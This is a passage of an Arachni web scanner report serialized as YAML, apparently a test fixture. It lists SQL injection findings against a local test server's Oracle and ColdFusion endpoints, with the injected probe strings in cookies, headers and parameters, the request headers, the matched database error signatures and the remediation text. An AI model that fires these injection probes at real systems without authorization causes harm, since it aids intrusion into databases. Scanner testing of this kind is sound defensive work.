    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      (PLS|ORA)-[0-9][0-9][0-9][0-9]
      java.sql.SQLException
      Oracle error
      Oracle stuff Driver
      Warning stuff oci_ stuff
      Warning stuff ora_ stuff

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "151"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/oracle/cookie/flip
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"(PLS|ORA)-[0-9][0-9][0-9][0-9]\\njava.sql.SQLException\\nOracle error\\nOracle stuff Driver\\nWarning stuff oci_ stuff\\nWarning stuff ora_ stuff\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "136"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/oracle/cookie/append
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      (PLS|ORA)-[0-9][0-9][0-9][0-9]
      java.sql.SQLException
      Oracle error
      Oracle stuff Driver
      Warning stuff oci_ stuff
      Warning stuff ora_ stuff

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "301"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/oracle/header/flip
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"(PLS|ORA)-[0-9][0-9][0-9][0-9]\\njava.sql.SQLException\\nOracle error\\nOracle stuff Driver\\nWarning stuff oci_ stuff\\nWarning stuff ora_ stuff\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/oracle/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "136"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java.sql.SQLException
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:java\.sql\.SQLException)
      :match: java.sql.SQLException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/oracle/header/append
      :verification: false
      :id: java.sql.SQLException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:java\.sql\.SQLException)
    regexp_match: java.sql.SQLException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      (PLS|ORA)-[0-9][0-9][0-9][0-9]
      java.sql.SQLException
      Oracle error
      Oracle stuff Driver
      Warning stuff oci_ stuff
      Warning stuff ora_ stuff

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/oracle/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "46"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/coldfusion/form/flip
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"[Macromedia][SQLServer JDBC Driver]\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "36"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/coldfusion/form/append
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [Macromedia][SQLServer JDBC Driver]

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "46"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/coldfusion/link/flip?input=default
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"[Macromedia][SQLServer JDBC Driver]\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "36"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/coldfusion/link/append?input=default
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [Macromedia][SQLServer JDBC Driver]

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "46"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/coldfusion/cookie/flip
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"[Macromedia][SQLServer JDBC Driver]\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "36"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/coldfusion/cookie/append
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
